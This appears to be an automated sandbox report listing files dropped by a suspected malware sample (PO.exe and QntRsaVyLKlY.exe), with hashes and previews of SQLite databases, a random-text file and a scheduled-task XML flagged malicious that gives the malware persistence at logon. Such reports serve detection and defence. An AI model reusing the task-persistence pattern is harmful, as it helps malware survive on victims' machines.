                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.696508269038202
                      Encrypted:false
                      SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                      MD5:0E9E92228B27AD7E7B4449467A529B0C
                      SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                      SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                      SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                      Malicious:false
                      Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1585
                      Entropy (8bit):5.110833937586022
                      Encrypted:false
                      SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtkxvn:cgergYrFdOFzOzN33ODOiDdKrsuT0v
                      MD5:A1FB6FDCFB95458E7BC9B104B5BB4C08
                      SHA1:AEE25208B99AA7735B9F590A9C31605977AC88F5
                      SHA-256:78E2CAB5D6C25F55213ADA042195A6760B9B3B040414ABB124F5EC77B8872D74
                      SHA-512:828994645930D8A1153CFE0A4D81425DC093A4CC9B61260A4D70DDAE4725D65C3199B201BCB6D0FE9B5CBD23E4D4FCDFE0C9A11ABCA589F7A7FD9AE5F048CE9A
                      Malicious:true
                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
